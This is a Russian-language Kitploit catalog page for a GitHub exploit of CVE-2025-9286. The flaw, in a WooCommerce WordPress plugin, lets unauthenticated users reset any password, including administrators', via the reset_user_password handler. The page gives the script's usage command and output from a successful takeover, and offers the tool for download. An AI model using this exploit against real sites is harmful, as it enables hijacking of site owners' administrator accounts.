Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-9286 — Appy Pie Connect for WooCommerce <= 1.1.2 — Отсутствие авторизации, приводящее к неаутентифицированному повышению привилегий | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2025-9286
Повышение привилегийАтаки на ПаролиЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubnxploited/cve-2025-9286

CVE-2025-9286

Appy Pie Connect for WooCommerce <= 1.1.2 — Отсутствие авторизации, приводящее к неаутентифицированному повышению привилегий

Репозиторий
311 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-9286

Appy Pie Connect for WooCommerce <= 1.1.2 - Отсутствие авторизации, ведущее к неаутентифицированному повышению привилегий

⚠️ Appy Pie Connect для WooCommerce <= 1.1.2 - Отсутствие авторизации, ведущее к неаутентифицированному повышению привилегий через reset_user_password

📝 Описание

Плагин Appy Pie Connect for WooCommerce для WordPress уязвим к повышению привилегий из-за отсутствия авторизации в REST-обработчике reset_user_password() во всех версиях вплоть до 1.1.2 включительно.
Это позволяет неаутентифицированным злоумышленникам сбрасывать пароль произвольных пользователей, включая администраторов, получая тем самым административный доступ.

  • CVE: CVE-2025-9286
  • CVSS: 9.8 (Критический)

💻 Скрипт эксплойта

Следующий эксплойт можно использовать для эксплуатации CVE-2025-9286 на сайтах WordPress, где установлена уязвимая версия плагина.

Имя скрипта: CVE-2025-9286.py

⚙️ Использование

root@kitploit:~
python CVE-2025-9286.py -u http://nxploit.ddev.site/ -id 1

🟢 Пример вывода (успешная эксплуатация)

root@kitploit:~
[+] Checking plugin version: http://nxploit.ddev.site/wp-content/plugins/appy-pie-connect-for-woocommerce/readme.txt
[!] Vulnerable plugin detected (1.1.2). Attempting exploitation...
[*] Please wait, attempting to change password...
[+] Exploit successful! Password has been reset.
[*] New password: Nxploited
[+] Vulnerability exploited and password changed successfully.

📬 Контакты и сообщество

  • 📨 Telegram: @Kxploit
  • 📡 Telegram-канал: @KNxploited

⚠️ Отказ от ответственности

Данный эксплойт предназначен только для образовательных целей и авторизованного тестирования на проникновение.
Несанкционированное использование в отношении систем без явного разрешения незаконно.
Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый данным инструментом.


Автор: Khaled Alenazi (Nxploited)

Скачать инструмент